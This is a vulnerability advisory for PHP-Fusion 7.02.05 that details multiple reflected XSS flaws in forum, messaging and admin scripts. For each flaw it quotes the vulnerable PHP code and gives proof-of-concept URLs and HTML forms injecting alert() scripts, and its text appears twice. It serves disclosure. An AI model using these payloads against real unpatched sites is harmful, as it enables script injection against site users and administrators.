Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PHP-Fusion is a light-weight open-source content management system (CMS) written in PHP 5. It utilises a MySQL database to store your site content and includes a simple, comprehensive administration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages.
http://www.php-fusion.co.uk/news.php
http://sourceforge.net/projects/php-fusion/
Vulnerable is version 7.02.05 and possibly older versions.
New, patched version 7.02.06 available here:
http://www.php-fusion.co.uk/news.php?readmore=569
http://www.php-fusion.co.uk/downloads.ph...oad_id=264
Reflected XSS in "forum/viewthread.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "highlight"
Preconditions:
1. there must exist at least one forum thread
Php script "forum/viewthread.php" line 361:
Test (parameter "thread_id" must be valid):
http://localhost/phpfusion70205/forum/viewthread.php?thread_id=20&highlight=%2527]);});alert(123);/*
Reflected XSS in "messages.php"
Reason:
1. uninitialized variables "$user_list" and "$user_types"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "user_list", "user_types"
Preconditions:
1. logged in as user
2. register_globals=on
Php script "messages.php" line 482:
Test:
Similar problem is related to variable "$user_types", only in this case admin
access level is needed:
Php script "messages.php" line 490:
Reflected XSS in "infusions/shoutbox_panel/shoutbox_admin.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with shoutbox administration privileges
2. register_globals=on
Php script "infusions/shoutbox_panel/shoutbox_admin.php" line 149:
Test (parameter "aid" needs to be valid):
http://localhost/phpfusion70205/infusions/shoutbox_panel/shoutbox_admin.php?
aid=e017e24eb00e8ccf&page=settings&message=<body+onload=alert(123);+
Reflected XSS in "administration/news.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with news administration privileges
2. register_globals=on
Php script "administration/news.php" line 31:
Tests (parameter "aid" needs to be valid):
http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&error=9&message=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&status=1&message=<body+onload=alert(123);+
Reflected XSS in "administration/panel_editor.php"
Reason:
1. uninitialized variable "$panel_list"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "panel_list"
Preconditions:
1. logged in as admin with panel editing privileges
2. register_globals=on
Php script "administration/panel_editor.php" line 32:
Test (parameter "aid" needs to be valid):
Reflected XSS in "administration/phpinfo.php"
Reason: insufficient sanitization of html output
Attack vector: User-Agent string
Preconditions:
1. logged in as admin with php info view privileges
Php script "administration/phpinfo.php" line 46:
Reflected XSS in "administration/bbcodes.php"
Reason:
1. uninitialized variable "$__BBCODE__"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "__BBCODE__"
Preconditions:
1. logged in as admin with bbcode settings change privileges
2. register_globals=on
Php script "administration/bbcodes.php" line 141:
Test (parameter "aid" needs to be valid):
http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][description]=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][usage]=<body+onload=alert(123);+
Reflected XSS in multiple admin scripts, affected parameter "errorMessage"
Reason:
1. uninitialized variables "$error" and "$errorMessage"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "error" and "errorMessage"
Preconditions:
1. logged in as admin with appropriate privileges
2. register_globals=on
Php script "administration/article_cats.php" line 110:
The same vulnerability exists in four different admin scripts:
1. administration/article_cats.php
2. administration/download_cats.php
3. administration/news_cats.php
4. administration/weblink_cats.php
Tests (parameter "aid" needs to be valid):
http://localhost/phpfusion70205/administration/article_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/download_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/news_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/weblink_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
Reflected XSS in "administration/articles.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied POST parameters "body" and "body2"
Preconditions:
1. logged in as admin with articles administration privileges
Php script "administration/articles.php" line 70:
Test (parameter "aid" needs to be valid):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PHP-Fusion is a light-weight open-source content management system (CMS) written in PHP 5. It utilises a MySQL database to store your site content and includes a simple, comprehensive administration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages.
http://www.php-fusion.co.uk/news.php
http://sourceforge.net/projects/php-fusion/
Vulnerable is version 7.02.05 and possibly older versions.
New, patched version 7.02.06 available here:
http://www.php-fusion.co.uk/news.php?readmore=569
http://www.php-fusion.co.uk/downloads.ph...oad_id=264
Reflected XSS in "forum/viewthread.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "highlight"
Preconditions:
1. there must exist at least one forum thread
Php script "forum/viewthread.php" line 361:
Code:
// highlight jQuery plugin
if (isset($_GET['highlight'])) {
$words = explode(" ", urldecode($_GET['highlight']));
$higlight = ""; $i = 1; $c_words = count($words);
foreach ($words as $hlight) {
$higlight .= "'".$hlight."'";
$higlight .= ($i < $c_words ? "," : "");
$i++;
}
add_to_head("<script type='text/javascript' src='".INCLUDES."jquery/jquery.highlight.js'></script>");
$highlight_js .= "jQuery('.search_result').highlight([".$higlight."],{wordsOnly:true});";
http://localhost/phpfusion70205/forum/viewthread.php?thread_id=20&highlight=%2527]);});alert(123);/*
Reflected XSS in "messages.php"
Reason:
1. uninitialized variables "$user_list" and "$user_types"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "user_list", "user_types"
Preconditions:
1. logged in as user
2. register_globals=on
Php script "messages.php" line 482:
Code:
if ($_GET['msg_send'] == "0") {
echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/messages.php?msg_send=0" method="post">
<input type="hidden" name="chk_sendtoall" value="0">
<input type="hidden" name="user_list" value="</select><script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
access level is needed:
Php script "messages.php" line 490:
Code:
if (iADMIN && !isset($_GET['msg_id'])) {
echo "<label><input name='chk_sendtoall' type='checkbox' ".$sendtoall_chk." />\n";
echo "".$locale['434'].":</label> <select
name='msg_to_group'
class='textbox'>\n".$user_types."</select>\n";
Reflected XSS in "infusions/shoutbox_panel/shoutbox_admin.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with shoutbox administration privileges
2. register_globals=on
Php script "infusions/shoutbox_panel/shoutbox_admin.php" line 149:
Code:
if (isset($message) && $message != "") {
echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n"; }
http://localhost/phpfusion70205/infusions/shoutbox_panel/shoutbox_admin.php?
aid=e017e24eb00e8ccf&page=settings&message=<body+onload=alert(123);+
Reflected XSS in "administration/news.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with news administration privileges
2. register_globals=on
Php script "administration/news.php" line 31:
Code:
if (isset($_GET['error']) && isnum($_GET['error'])) {
if ($_GET['error'] == 1) {
$message = $locale['413'];
...
if ($message) { echo "<div id='close-message'>
<div class='admin-message'>".$message."</div></div>\n"; }
}
if (isset($_GET['status'])) {
if ($_GET['status'] == "sn") {
$message = $locale['410'];
...
if ($message) { echo "<div id='close-message'>
<div class='admin-message'>".$message."</div></div>\n"; }
}
http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&error=9&message=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&status=1&message=<body+onload=alert(123);+
Reflected XSS in "administration/panel_editor.php"
Reason:
1. uninitialized variable "$panel_list"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "panel_list"
Preconditions:
1. logged in as admin with panel editing privileges
2. register_globals=on
Php script "administration/panel_editor.php" line 32:
Code:
while ($folder = readdir($temp)) {
if (!in_array($folder, array(".","..")) && strstr($folder, "_panel")) {
if (is_dir(INFUSIONS.$folder)) $panel_list[] = $folder;
}
}
...
for ($i=0;$i < count($panel_list);$i++) {
echo "<option".($panel_filename == $panel_list[$i] ?
" selected='selected'" : "").">".$panel_list[$i]."</option>\n";
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/panel_editor.php?aid=e017e24eb00e8ccf" method="post">
<input type="hidden" name="panel_list[]" value="<script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
Reflected XSS in "administration/phpinfo.php"
Reason: insufficient sanitization of html output
Attack vector: User-Agent string
Preconditions:
1. logged in as admin with php info view privileges
Php script "administration/phpinfo.php" line 46:
Code:
$phpinfo .= "<tr>\n<td class='tbl2' style='width:20%'>".$locale['410']."</td>
<td class='tbl1' style='text-align:right'>".$_SERVER['HTTP_USER_AGENT']."</td></tr>\n";
Reflected XSS in "administration/bbcodes.php"
Reason:
1. uninitialized variable "$__BBCODE__"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "__BBCODE__"
Preconditions:
1. logged in as admin with bbcode settings change privileges
2. register_globals=on
Php script "administration/bbcodes.php" line 141:
Code:
echo "<td class='$cls'>".$__BBCODE__[0]['description']."</td>\n";
echo "<td class='$cls'>".$__BBCODE__[0]['usage']."</td>\n";
Test (parameter "aid" needs to be valid):
http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][description]=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][usage]=<body+onload=alert(123);+
Reflected XSS in multiple admin scripts, affected parameter "errorMessage"
Reason:
1. uninitialized variables "$error" and "$errorMessage"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "error" and "errorMessage"
Preconditions:
1. logged in as admin with appropriate privileges
2. register_globals=on
Php script "administration/article_cats.php" line 110:
Code:
if (isset($error) && isnum($error)) {
if ($error == 1) {
$errorMessage = $locale['460'];
} elseif ($error == 2) {
$errorMessage = $locale['461'];
}
if ($errorMessage) { echo "<div id='close-message'>
<div class='admin-message'>".$errorMessage."</div></div>\n"; }
The same vulnerability exists in four different admin scripts:
1. administration/article_cats.php
2. administration/download_cats.php
3. administration/news_cats.php
4. administration/weblink_cats.php
Tests (parameter "aid" needs to be valid):
http://localhost/phpfusion70205/administration/article_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/download_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/news_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
http://localhost/phpfusion70205/administration/weblink_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+
Reflected XSS in "administration/articles.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied POST parameters "body" and "body2"
Preconditions:
1. logged in as admin with articles administration privileges
Php script "administration/articles.php" line 70:
Code:
$bodypreview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body']));
$body2preview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body2']));
...
echo $bodypreview."\n";
...
echo $body2preview."\n";
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/articles.php?aid=0ebd6f54040890e8" method="post">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="body" value="<script>alert(123);</script>">
<input type="hidden" name="body2" value="<script>alert(321);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>